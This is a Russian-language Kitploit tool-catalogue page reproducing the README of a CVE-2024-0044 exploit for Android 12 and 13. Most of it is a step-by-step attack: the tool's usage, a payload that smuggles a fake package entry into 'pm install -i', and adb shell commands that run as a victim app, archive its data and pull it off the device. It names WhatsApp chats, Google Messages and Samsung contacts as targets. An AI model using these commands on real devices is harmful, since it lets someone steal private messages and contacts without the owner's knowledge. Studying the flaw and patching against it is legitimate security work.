Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve_2024_0044 — CVE-2024-0044: уязвимость высокой степени серьезности «run-as any app», затрагивающая Android версии 12 и 13 | Kitploit
Инструменты/GitHubGitHub/hunter24x24/cve_2024_0044
Безопасность AndroidПовышение привилегийАнализ уязвимостейЭксплуатацияЭксфильтрация данныхПост-эксплуатацияТестирование на ПроникновениеМобильная безопасность
GitHubhunter24x24/cve_2024_0044

cve_2024_0044

CVE-2024-0044: уязвимость высокой степени серьезности «run-as any app», затрагивающая Android версии 12 и 13

Репозиторий
122 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE 2024 0044

CVE-2024-0044, обнаруженная в функции createSessionInternal файла PackageInstallerService.java, представляет собой уязвимость высокой степени серьезности, затрагивающую Android версий 12 и 13. Эта уязвимость позволяет атакующему выполнить атаку "run-as any app", что приводит к локальному повышению привилегий без необходимости взаимодействия с пользователем. Проблема возникает из-за неправильной проверки входных данных в функции createSessionInternal. Атакующий может использовать это, манипулируя процессом создания сессии, потенциально получая несанкционированный доступ к конфиденциальным данным и выполняя несанкционированные действия на затронутом устройстве

Эксплойт был обнаружен Meta security

Доказательство концепции было обобщено и опубликовано Tiny hack

Подробности о патче безопасности можно найти в Android security bulletin

Предварительные требования

  1. Включите отладку по USB на вашем мобильном телефоне и подключите его к вашему компьютеру с помощью USB-кабеля или беспроводной отладки
  2. Загрузите любой APK-файл на ваш компьютер. Вы можете использовать F-DROID

Как использовать инструмент

root@kitploit:~
python3 cve_2024_0044.py -h
                                                                               
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#      
        
usage: cve_2024_0044.py [-h] -P P -A A

CVE-2024-0044: run-as any app @Pl4int3xt

options:
  -h, --help  show this help message and exit
  -P P        package name (default: None)
  -A A        apk file path (default: None)

-P используется для указания имени целевого пакета, от имени которого вы хотите запуститься

-A для указания пути к APK-файлу, который нужно передать на устройство

Эксплуатация

Запустите инструмент python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

Будет сгенерирован файл payload.txt примерно следующего содержания

root@kitploit:~
PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk

Инструмент автоматизирует некоторые части, а другие выполняются вручную. Вы можете выйти после генерации payload и выполнить все команды вручную, или продолжить с инструкциями

Затем вам нужно подключиться к устройству через adb shell и вставить payload, убедившись, что после последней команды вы получили сообщение Success

root@kitploit:~
pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success

Затем получаем данные WhatsApp с помощью следующих команд

root@kitploit:~
pixel:/ $ mkdir /data/local/tmp/wa/                                                                            
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

Создайте временный каталог: mkdir /data/local/tmp/wa/

Создайте временный файл для tar-архива: touch /data/local/tmp/wa/wa.tar

Установите открытые права доступа: chmod -R 0777 /data/local/tmp/wa/, чтобы любой пользователь мог читать, записывать и выполнять в этом каталоге.

Переключите контекст пользователя: run-as victim, чтобы получить те же права, что и пользователь "victim".

Заархивируйте данные целевого приложения: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp, создав tarball каталога данных WhatsApp.

Наконец, извлеките данные

adb pull /data/local/tmp/wa/wa.tar

Вы можете распаковать данные с помощью 7z или любого другого инструмента

Вы можете использовать Whatsapp chat exporter для преобразования в HTML

Это позволяет получить данные WhatsApp без root-доступа на устройстве

Извлечение Google Messages

Просто измените имя пакета следующим образом:

root@kitploit:~
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.google.android.apps.messaging -A ~/Down
loads/F-Droid.apk

Следуйте инструкциям выше и после извлечения файла wa.tar распакуйте его и откройте разговоры в com.google.android.apps.messaging/databases/bugle_db с помощью sqlitebrowser или любого другого инструмента

Извлечение контактов

Протестировано на устройствах Samsung. Для других устройств проверьте имя пакета поставщика контактов.

root@kitploit:~
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.samsung.android.app.contacts -A ~/Downloads/F-Droid.apk

Следуйте инструкциям выше и после извлечения файла wa.tar распакуйте его и откройте контакты в com.samsung.android.providers.contacts/databases/contacts2.db с помощью sqlitebrowser или любого другого инструмента. Файл базы данных содержит информацию обо всех учетных записях электронной почты пользователя вместе со списком контактов.

Скачать инструмент